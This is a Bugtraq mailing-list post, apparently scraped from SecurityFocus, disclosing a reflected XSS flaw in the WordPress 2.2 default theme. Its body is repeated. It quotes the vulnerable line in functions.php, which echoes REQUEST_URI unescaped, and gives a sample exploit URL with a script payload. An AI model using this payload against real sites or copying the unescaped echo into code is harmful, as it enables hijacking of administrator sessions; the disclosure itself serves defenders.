Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Back to list
|
Post reply
Wordpress default theme XSS (admin) and other problems
Jun 08 2007 01:15PM
John Smith (zamolx3 gmail com)
There is an XSS in the Wordpress default theme. Tested on WordPress version 2.2
Filename functions.php, line 387.
Code:
<form style="display: inline" method="post" name="hicolor"
id="hicolor" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
$_SERVER['REQUEST_URI'] is directly echoed to the user.
This problem can be exploited if the adminstrator is logged in.
Sample exploit URL.
http://www.example.com/wp-admin/themes.php?page=functions.php&zmx"><scri
pt>alert(1)</script>
There are other XSS vulnerabilities in popular Wordpress themes.
More details on http://www.xssnews.com/
[ reply ]
Privacy Statement
Copyright 2008, SecurityFocus
Filename functions.php, line 387.
Code:
<form style="display: inline" method="post" name="hicolor"
id="hicolor" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
$_SERVER['REQUEST_URI'] is directly echoed to the user.
This problem can be exploited if the adminstrator is logged in.
Sample exploit URL.
http://www.example.com/wp-admin/themes.php?page=functions.php&zmx"><scri
pt>alert(1)</script>
There are other XSS vulnerabilities in popular Wordpress themes.
More details on http://www.xssnews.com/
[ reply ]